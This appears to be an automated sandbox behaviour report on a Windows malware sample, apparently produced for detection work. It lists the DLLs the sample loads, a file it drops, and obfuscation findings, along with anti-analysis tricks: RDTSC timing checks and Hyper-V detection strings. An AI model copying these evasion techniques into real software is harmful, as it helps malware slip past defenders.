      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: 0GuwV0t2UU.exeReversingLabs: Detection: 58%
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeFile read: C:\Users\user\Desktop\0GuwV0t2UU.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\0GuwV0t2UU.exe "C:\Users\user\Desktop\0GuwV0t2UU.exe"
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeProcess created: C:\Users\user\Desktop\0GuwV0t2UU.exe "C:\Users\user\Desktop\0GuwV0t2UU.exe"
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeProcess created: C:\Users\user\Desktop\0GuwV0t2UU.exe "C:\Users\user\Desktop\0GuwV0t2UU.exe"Jump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: 0GuwV0t2UU.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: 0GuwV0t2UU.exe, 00000007.00000001.2399745830.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: Binary string: wntdll.pdbUGP source: 0GuwV0t2UU.exe, 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmp, 0GuwV0t2UU.exe, 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, 0GuwV0t2UU.exe, 00000007.00000003.2779347987.000000003761C000.00000004.00000020.00020000.00000000.sdmp, 0GuwV0t2UU.exe, 00000007.00000003.2777362328.0000000037463000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: 0GuwV0t2UU.exe, 0GuwV0t2UU.exe, 00000007.00000002.3145323147.000000003796E000.00000040.00001000.00020000.00000000.sdmp, 0GuwV0t2UU.exe, 00000007.00000002.3145323147.00000000377D0000.00000040.00001000.00020000.00000000.sdmp, 0GuwV0t2UU.exe, 00000007.00000003.2779347987.000000003761C000.00000004.00000020.00020000.00000000.sdmp, 0GuwV0t2UU.exe, 00000007.00000003.2777362328.0000000037463000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: 0GuwV0t2UU.exe, 00000007.00000001.2399745830.0000000000649000.00000020.00000001.01000000.00000006.sdmp

      Data Obfuscation

      barindex
      Source: Yara matchFile source: 00000000.00000002.2401247870.00000000049AA000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 0_2_6E9F1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6E9F1BFF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 0_2_6E9F30C0 push eax; ret 0_2_6E9F30EE
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377D1337 push eax; iretd 7_2_377D1369
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377D27FA pushad ; ret 7_2_377D27F9
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377D225F pushad ; ret 7_2_377D27F9
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378009AD push ecx; mov dword ptr [esp], ecx7_2_378009B6
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377D283D push eax; iretd 7_2_377D2858
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeFile created: C:\Users\user\AppData\Local\Temp\nsaC158.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeAPI/Special instruction interceptor: Address: 4C6D03F
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeAPI/Special instruction interceptor: Address: 2DFD03F
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeRDTSC instruction interceptor: First address: 4C2BA61 second address: 4C2BA61 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FCFEC5181B7h 0x00000006 cmp bl, FFFFFF9Fh 0x00000009 inc ebp 0x0000000a inc ebx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeRDTSC instruction interceptor: First address: 2DBBA61 second address: 2DBBA61 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FCFED102C77h 0x00000006 cmp bl, FFFFFF9Fh 0x00000009 inc ebp 0x0000000a inc ebx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378D16A6 rdtsc 7_2_378D16A6
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsaC158.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeAPI coverage: 0.1 %
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exe TID: 6844Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 0_2_004069FF FindFirstFileW,FindClose,0_2_004069FF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 0_2_00405DAE CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405DAE
      Source: 0GuwV0t2UU.exe, 00000007.00000002.3115865234.000000000753E000.00000004.00000020.00020000.00000000.sdmp, 0GuwV0t2UU.exe, 00000007.00000003.2777753505.000000000753E000.00000004.00000020.00020000.00000000.sdmp, 0GuwV0t2UU.exe, 00000007.00000002.3115603087.00000000074E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeAPI call chain: ExitProcess graph end nodegraph_0-4526
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeAPI call chain: ExitProcess graph end nodegraph_0-4523
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378D16A6 rdtsc 7_2_378D16A6
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378435C0 NtCreateMutant,LdrInitializeThunk,7_2_378435C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 0_2_6E9F1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6E9F1BFF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378BF78A mov eax, dword ptr fs:[00000030h]7_2_378BF78A
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FB765 mov eax, dword ptr fs:[00000030h]7_2_377FB765
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FB765 mov eax, dword ptr fs:[00000030h]7_2_377FB765
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FB765 mov eax, dword ptr fs:[00000030h]7_2_377FB765
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FB765 mov eax, dword ptr fs:[00000030h]7_2_377FB765
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378897A9 mov eax, dword ptr fs:[00000030h]7_2_378897A9
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3788F7AF mov eax, dword ptr fs:[00000030h]7_2_3788F7AF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3788F7AF mov eax, dword ptr fs:[00000030h]7_2_3788F7AF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3788F7AF mov eax, dword ptr fs:[00000030h]7_2_3788F7AF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3788F7AF mov eax, dword ptr fs:[00000030h]7_2_3788F7AF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3788F7AF mov eax, dword ptr fs:[00000030h]7_2_3788F7AF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3782D7B0 mov eax, dword ptr fs:[00000030h]7_2_3782D7B0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378D37B6 mov eax, dword ptr fs:[00000030h]7_2_378D37B6
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378BD7B0 mov eax, dword ptr fs:[00000030h]7_2_378BD7B0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378BD7B0 mov eax, dword ptr fs:[00000030h]7_2_378BD7B0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378057C0 mov eax, dword ptr fs:[00000030h]7_2_378057C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378057C0 mov eax, dword ptr fs:[00000030h]7_2_378057C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378057C0 mov eax, dword ptr fs:[00000030h]7_2_378057C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377F9730 mov eax, dword ptr fs:[00000030h]7_2_377F9730
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377F9730 mov eax, dword ptr fs:[00000030h]7_2_377F9730
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3780D7E0 mov ecx, dword ptr fs:[00000030h]7_2_3780D7E0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37805702 mov eax, dword ptr fs:[00000030h]7_2_37805702
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37805702 mov eax, dword ptr fs:[00000030h]7_2_37805702
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37807703 mov eax, dword ptr fs:[00000030h]7_2_37807703
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3783F71F mov eax, dword ptr fs:[00000030h]7_2_3783F71F
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3783F71F mov eax, dword ptr fs:[00000030h]7_2_3783F71F
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37803720 mov eax, dword ptr fs:[00000030h]7_2_37803720
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3781F720 mov eax, dword ptr fs:[00000030h]7_2_3781F720
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3781F720 mov eax, dword ptr fs:[00000030h]7_2_3781F720
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3781F720 mov eax, dword ptr fs:[00000030h]7_2_3781F720
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378BF72E mov eax, dword ptr fs:[00000030h]7_2_378BF72E
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378C972B mov eax, dword ptr fs:[00000030h]7_2_378C972B
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378DB73C mov eax, dword ptr fs:[00000030h]7_2_378DB73C
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378DB73C mov eax, dword ptr fs:[00000030h]7_2_378DB73C
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378DB73C mov eax, dword ptr fs:[00000030h]7_2_378DB73C
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378DB73C mov eax, dword ptr fs:[00000030h]7_2_378DB73C
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37835734 mov eax, dword ptr fs:[00000030h]7_2_37835734
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3780973A mov eax, dword ptr fs:[00000030h]7_2_3780973A
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3780973A mov eax, dword ptr fs:[00000030h]7_2_3780973A
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37813740 mov eax, dword ptr fs:[00000030h]7_2_37813740
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37813740 mov eax, dword ptr fs:[00000030h]7_2_37813740
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37813740 mov eax, dword ptr fs:[00000030h]7_2_37813740
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378D3749 mov eax, dword ptr fs:[00000030h]7_2_378D3749
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FF7BA mov eax, dword ptr fs:[00000030h]7_2_377FF7BA
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FF7BA mov eax, dword ptr fs:[00000030h]7_2_377FF7BA
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FF7BA mov eax, dword ptr fs:[00000030h]7_2_377FF7BA
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FF7BA mov eax, dword ptr fs:[00000030h]7_2_377FF7BA
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FF7BA mov eax, dword ptr fs:[00000030h]7_2_377FF7BA
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FF7BA mov eax, dword ptr fs:[00000030h]7_2_377FF7BA
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FF7BA mov eax, dword ptr fs:[00000030h]7_2_377FF7BA
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FF7BA mov eax, dword ptr fs:[00000030h]7_2_377FF7BA
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FF7BA mov eax, dword ptr fs:[00000030h]7_2_377FF7BA
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378A375F mov eax, dword ptr fs:[00000030h]7_2_378A375F
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378A375F mov eax, dword ptr fs:[00000030h]7_2_378A375F
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378A375F mov eax, dword ptr fs:[00000030h]7_2_378A375F
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378A375F mov eax, dword ptr fs:[00000030h]7_2_378A375F
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378A375F mov eax, dword ptr fs:[00000030h]7_2_378A375F
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3788368C mov eax, dword ptr fs:[00000030h]7_2_3788368C
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3788368C mov eax, dword ptr fs:[00000030h]7_2_3788368C
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3788368C mov eax, dword ptr fs:[00000030h]7_2_3788368C
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3788368C mov eax, dword ptr fs:[00000030h]7_2_3788368C
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3780B6C0 mov eax, dword ptr fs:[00000030h]7_2_3780B6C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3780B6C0 mov eax, dword ptr fs:[00000030h]7_2_3780B6C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3780B6C0 mov eax, dword ptr fs:[00000030h]7_2_3780B6C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3780B6C0 mov eax, dword ptr fs:[00000030h]7_2_3780B6C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3780B6C0 mov eax, dword ptr fs:[00000030h]7_2_3780B6C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3780B6C0 mov eax, dword ptr fs:[00000030h]7_2_3780B6C0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378C16CC mov eax, dword ptr fs:[00000030h]7_2_378C16CC
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378C16CC mov eax, dword ptr fs:[00000030h]7_2_378C16CC
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378C16CC mov eax, dword ptr fs:[00000030h]7_2_378C16CC
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378C16CC mov eax, dword ptr fs:[00000030h]7_2_378C16CC
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378BF6C7 mov eax, dword ptr fs:[00000030h]7_2_378BF6C7
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378316CF mov eax, dword ptr fs:[00000030h]7_2_378316CF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FF626 mov eax, dword ptr fs:[00000030h]7_2_377FF626
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FF626 mov eax, dword ptr fs:[00000030h]7_2_377FF626
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FF626 mov eax, dword ptr fs:[00000030h]7_2_377FF626
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FF626 mov eax, dword ptr fs:[00000030h]7_2_377FF626
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FF626 mov eax, dword ptr fs:[00000030h]7_2_377FF626
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FF626 mov eax, dword ptr fs:[00000030h]7_2_377FF626
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FF626 mov eax, dword ptr fs:[00000030h]7_2_377FF626
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FF626 mov eax, dword ptr fs:[00000030h]7_2_377FF626
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FF626 mov eax, dword ptr fs:[00000030h]7_2_377FF626
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3782D6E0 mov eax, dword ptr fs:[00000030h]7_2_3782D6E0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3782D6E0 mov eax, dword ptr fs:[00000030h]7_2_3782D6E0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378936EE mov eax, dword ptr fs:[00000030h]7_2_378936EE
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378936EE mov eax, dword ptr fs:[00000030h]7_2_378936EE
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378936EE mov eax, dword ptr fs:[00000030h]7_2_378936EE
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378936EE mov eax, dword ptr fs:[00000030h]7_2_378936EE
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378936EE mov eax, dword ptr fs:[00000030h]7_2_378936EE
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378936EE mov eax, dword ptr fs:[00000030h]7_2_378936EE
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378336EF mov eax, dword ptr fs:[00000030h]7_2_378336EF
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378BD6F0 mov eax, dword ptr fs:[00000030h]7_2_378BD6F0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3783F603 mov eax, dword ptr fs:[00000030h]7_2_3783F603
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37831607 mov eax, dword ptr fs:[00000030h]7_2_37831607
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37803616 mov eax, dword ptr fs:[00000030h]7_2_37803616
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37803616 mov eax, dword ptr fs:[00000030h]7_2_37803616
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378D5636 mov eax, dword ptr fs:[00000030h]7_2_378D5636
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377F76B2 mov eax, dword ptr fs:[00000030h]7_2_377F76B2
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377F76B2 mov eax, dword ptr fs:[00000030h]7_2_377F76B2
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377F76B2 mov eax, dword ptr fs:[00000030h]7_2_377F76B2
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FD6AA mov eax, dword ptr fs:[00000030h]7_2_377FD6AA
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FD6AA mov eax, dword ptr fs:[00000030h]7_2_377FD6AA
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37839660 mov eax, dword ptr fs:[00000030h]7_2_37839660
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_37839660 mov eax, dword ptr fs:[00000030h]7_2_37839660
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3789D660 mov eax, dword ptr fs:[00000030h]7_2_3789D660
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3788B594 mov eax, dword ptr fs:[00000030h]7_2_3788B594
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3788B594 mov eax, dword ptr fs:[00000030h]7_2_3788B594
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_377FB562 mov eax, dword ptr fs:[00000030h]7_2_377FB562
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378215A9 mov eax, dword ptr fs:[00000030h]7_2_378215A9
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378215A9 mov eax, dword ptr fs:[00000030h]7_2_378215A9
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378215A9 mov eax, dword ptr fs:[00000030h]7_2_378215A9
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378215A9 mov eax, dword ptr fs:[00000030h]7_2_378215A9
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_378215A9 mov eax, dword ptr fs:[00000030h]7_2_378215A9
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3782F5B0 mov eax, dword ptr fs:[00000030h]7_2_3782F5B0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3782F5B0 mov eax, dword ptr fs:[00000030h]7_2_3782F5B0
      Source: C:\Users\user\Desktop\0GuwV0t2UU.exeCode function: 7_2_3782F5B0 mov eax, dword ptr fs:[00000030h]7_2_3782F5B0
